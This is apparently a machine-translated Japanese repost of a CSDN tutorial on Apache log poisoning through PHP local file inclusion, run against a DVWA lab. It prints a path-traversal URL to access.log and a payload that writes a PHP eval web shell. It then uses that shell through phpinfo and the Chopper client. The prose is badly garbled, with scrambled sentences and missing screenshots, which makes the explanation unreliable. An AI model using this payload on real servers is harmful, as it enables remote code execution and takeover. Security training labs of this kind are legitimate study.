脆弱性の再生の記事 - 高度なファイルインクルージョンの脆弱性 - ログファイルの脆弱性

ログファイルの脆弱性原理
、その後、攻撃者が侵入するようにApacheのログファイルを悪用される可能性があるすべての悪用抜け穴が含まれていることができなかったことを意味し、そこにPHPでローカルファイルインクルージョンの脆弱性ですが、適切にファイルをアップロードすることはできません。
Apacheサーバは、2つのログファイルを生成し実行した後、これらの2つのファイルは、私たちの操作のApacheのログ・ファイル・レコードの下のaccess.log(アクセスログ)とのerror.log(エラーログ)、であり、アクセス・ログ・ファイルを書き込みaccess.log
例えば:http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=../../../../Apache-20\logs\access.log

実験環境:

環境設定:

Apacheの設定ファイルを開きます。

ここに画像を挿入説明

検索CustomLog "logs/access.log" common以前のコメント削除し、その後、再起動PHPstudy
ここに画像を挿入説明

シミュレーション:

1、現在のWebページキャプチャで

ここに画像を挿入説明

図2に示すように送られ、Repeaterモジュール

ここに画像を挿入説明

3、URLを変更<?php $file = fopen('c.php','w');fputs($file,'<?php @eval($_REQUEST[666]);?>')?>して、GOをクリックしてください

ここに画像を挿入説明

4、アクセスC:\\phpStudy\\PHPTutorial\\Apache\\logs\\access.log図の実装を成功次のパス、。

ここに画像を挿入説明

図5に示すように、内fiケースの入力がc.php?666=phpinfo();正常に実行され

ここに画像を挿入説明

6、接続されているチョッパーの使用は、URLをコピー

ここに画像を挿入説明
ここに画像を挿入説明

公開された64元の記事 ウォンの賞賛500 ・は 80000 +を見て

おすすめ

転載: blog.csdn.net/weixin_45728976/article/details/104401341
おすすめ